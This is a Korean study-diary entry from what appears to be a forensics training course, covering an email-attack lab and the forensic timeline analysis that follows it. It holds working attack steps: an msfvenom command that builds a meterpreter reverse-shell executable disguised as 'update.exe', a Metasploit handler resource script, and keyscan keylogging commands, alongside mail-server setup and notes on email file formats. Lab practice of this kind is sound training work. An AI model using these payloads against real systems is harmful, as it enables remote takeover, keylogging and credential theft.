📘 Day 42 (2025.08.12.TUE) - 포렌식 시나리오 타임라인분석표(이메일 분석)
📨 해커 → st.kr 이메일 공격 시나리오
1. 해커가 악성코드 생성
2. 해커가 메일 서버로 악성코드 메일 전송
3. 관리자(win7) 악성코드 메일 읽음
4. 관리자가 악성코드 클릭
5. 해커가 keyfile 유출 시도
🌐 UTM - NAT 설정
kali
ping st.kr
nslookup st.kr
Ubuntu2 (1.1 메인 서버)
nano /etc/mail/sendmail.cf → Cwst.kr 추가
nano /etc/mail/local-host-names → st.geumsol.kr → geumsol.kr 수정, st.kr 추가
nano /etc/mail/access → st.kr RELAY 추가
makemap hash /etc/mail/access < /etc/mail/access
systemctl restart sendmail
systemctl enable sendmail
win2022(st.kr) - DNS - 새 호스팅: mail 추가 → 메일 전송 성공
💻 Windows 악성코드 생성
msfvenom
/usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> -f exe -o payload.exe
→ 수정
/usr/bin/msfvenom -p windows/meterpreter/reverse_tcp LHOST=100.100.100.1 -f exe -o update.exe
📧 Windows 악성코드 메일 발송
evolution 메일 첨부파일 → Insert - Attachment
From: master@mail.geumsol.kr
To: master@st.kr
🔍 이메일 분석 관련
해커가 악성코드를 전송한 시각 확인 → mbs(mail box store)
opera와 서버 연결 방식: pop3 또는 imap
imap 사용 시 흔적이 없을 수 있음
thunderbird 설치 후 연결
이메일 관련 주요 파일 확장자
.EDB: Microsoft Exchange
.EML: Email Message format
.MBOX: Mailbox format
.MSG: Microsoft Message file
.OST: Microsoft Offline Storage Table
.PST: Microsoft Personal Storage Table
Opera Mail: mbs (메일 박스 파일)
🗂️ Forensic Explorer 분석
New case: 20250812001, Investigator: yes
Add image: D:\VM 경로, win7.vmdk 추가
로딩 후 File System 분석
🔑 Key 방식 인증 전환
관리자가 사용한 key를 해커가 재사용하여 웹서버 파괴
🛡️ 새 마스커레이딩 설정
inside(Network) → outside
kali - payload.rc
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 100.100.100.1
set lport 4444
exploit
msfconsole -r payload.rc
netstat -ant → port 확인 (100.100.100.1:4444)
🖥️ Meterpreter
Metasploit 프레임워크에서 제공하는 고급 페이로드로 원격 제어, 정보 수집, 조작 가능
win7 - putty(192.168.1.1) 접속 후 update.exe 파일 실행 → su 접속
kali에서 meterpreter 연결 후:
meterpreter > keyscan_start
meterpreter > keyscan_dump